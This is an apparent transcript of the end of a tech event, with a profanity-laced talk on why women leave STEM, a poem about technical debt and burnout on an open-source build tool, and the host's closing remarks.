So what is the case of the leaky pipeline? It begins in childhood, in usually elementary school, it gets far worse in middle school. In middle school, 74% of girls want to go into STEM. But by the time they go to college, it's 0.4%. So why is that? Because there's learned implicit bias in young children. As a kindergarten teacher, I can tell you that exists. In the 1940s, psychologists figured out that young black children as young as three, four, and five already had a clear preference for white dolls against black dolls. So what the fuck happened to the girls? The teachers had gender bias. They consistently underestimated the girls. They were placed in ability groups. They got a watered down curriculum. They didn't have equal opportunity to a high advanced curriculum. Why? And let's say they go to college. Let's say they get to college, but they are discouraged from STEM. Why would you go into STEM? It's so masculine. So what are the barriers for women, and especially women of color? Implicit bias, name bias, race bias, sex bias, beauty bias, name it, they have it. So let's say they go to college and they can afford it. They drop out of STEM majors. Cheryl Sandburg said there aren't more women in STEM because there aren't more women in STEM. Women apply to roles where they meet 100% of the qualifications. When? 60%. Women are 30% less likely to be called for an interview against men who have the same effing qualifications. Women face subtle but very pervasive doubts. Nothing that has to do with their actual performance. They experience sexual harassment, isolation. They are excluded from leadership opportunities. And I'm gonna leave this here because this is a room full of STEM people. I think you can read a graph just fine. That graph has an effing mood. And also no one told me I could cuss. Fine, let's say you've successfully eliminated all barriers, you've hired women, you've hired women of color. Yay, woohoo, you're done, right? No, now you've gotta retain them. How the fuck are you gonna retain them? Let's find out. Why do women leave tech? The culture benefits males. They perpetuate an exclusionary culture. It makes it really uncomfortable for women and especially minority women. There's a wage gap. It's about 52 to 84 cents to every dollar a man earns. They have a 45% chance of being sexually harassed. Second, only to the military. Women are more than twice as likely to leave STEM jobs because they're expected to raise a family, raise children. And guess what? The fucking pandemic made it worse. In STEM, do women experience more institutional culture barriers or stigmas more than men? Mm, that's about 98%. And what challenges do they face? I'll leave that up there. I don't have to read it to you. These are the supports that women need to remain and thrive in STEM. It's one thing to hire them. It's a whole another cup of tea to actually retain them. These are the things women need. They need mental health help and all of those things. Ultimately, race and gender continue to matter in very complicated, nuanced ways even today. So we got women's suffrage in 1920, but we run the risk of fucking up those gains if we don't diversify our workplace. This is me. Contact me if you have any questions. Thank you very much. Thank you, RT. I guess next time I will tell everyone they're allowed to curse, but I love the forks. Thank you so much. Everyone's gonna work on mentorship programs and pipelines after that one, yeah? Yes? You did not warn me how emotional I was gonna get after RT's talk. You know, we've gotten the whole gambit of emotions tonight. So how about some poetry? Anybody else for some poetry? All right, to close out our talk for your whole rollercoaster of emotions for your evening, that's what we always promise for upscale, highs, lows, lefts, rights, all those things. Let's welcome Fatima, who's gonna give us a little bit of poetry. Yeah, sounds good. Awesome. Hi everyone, my name is Fatima. I'm a developer evangelist at GitLab. You can find me on the internet as Sugar Overflow. And this is a very special ode to technical debt that might get a little emotional thanks to RT. Do, do, do, do, do. Our story begins once upon a time in a land far, far away where lightning bolts strike. A legend now etched into this rhyme about a tool by which open sorcerers conquered the night, automated build tools, that old DevOps pipeline. And so arrived our adventurer at hand to maintain and build upon the tooling mentioned and found there was a mountain of technical debt, no documentation, no roadmap, no updated issues, only dread. Composer 2.0 was on its way, which meant that build tools too needed an update. So she gathered the council of open sorcerers in the land, but no one had the pieces of this mysterious roadmap. And so to the king she went asking for support for resources, for contractors, or from budget, from the court. Be gone, said the king, and go do your magic. You don't need a whole team, just you will manage. Our adventurer crawled through the depths of the code, configured, refactored, tested, and steered with some help from her peers, she persevered. Features, dependency updates, and new releases. She built bridges to connect all of the dots and the pieces. I definitely talk too fast for an ignite talk. And then came a wave of users, 4,000 and more. Issues were opened and reopened, bugs were reported, and there were edge cases inshore. And the high council of sorcerers met each week and noted that it was too much for just one person to upkeep. I'm sure we've all been there, expected to do five jobs. Our adventurer, she tried to communicate the tech debt to request resources and express the growing impact. But when the storm of issues and merger requests came, it was only her mentors and friends who kept her sane. To friends she spoke of a competence and dying hopes, of stress over this tool that the company didn't even officially support. They reminded her that it didn't reflect on her competence or self-worth. And having carried that mountain alone was a measure of how much she'd grown. Enough is enough, she realized one day, and couldn't come up with enough reasons to stay. The meadow she met, a delightful tanuki. Come with me, it said, to a land far, far away, where we'll value your expertise and you'll want to stay. And so from the crossroads of tech debt and burnout, our adventurer moved on. And on to you I pass her legend and legacy that moving on was better than carrying a mountain of tech debt alone. Thank you. Who is ready to buy the children's book? Yeah, I think part two is an order for a kid's book for growing technologists with diverse profiles. You know, we could work on it. It'll be a scale exclusive. All right, is Louise still here by any chance? No worries. Okay, that concludes our content for upscale tonight. Yes, seriously, speaking at upscale is super difficult. It seems really easy, but it's very hard for your slides to advance without you, whether you like it or not. So big congratulations to all seven of our speakers. Please thank them again, they did a great job. If you want to brave speaking at upscale next year, you can always let me know and I will put you on the nomination list. We might have a few more drink tickets lingering around. If so, try to locate one and grab a drink on your way out and thank you so much for attending.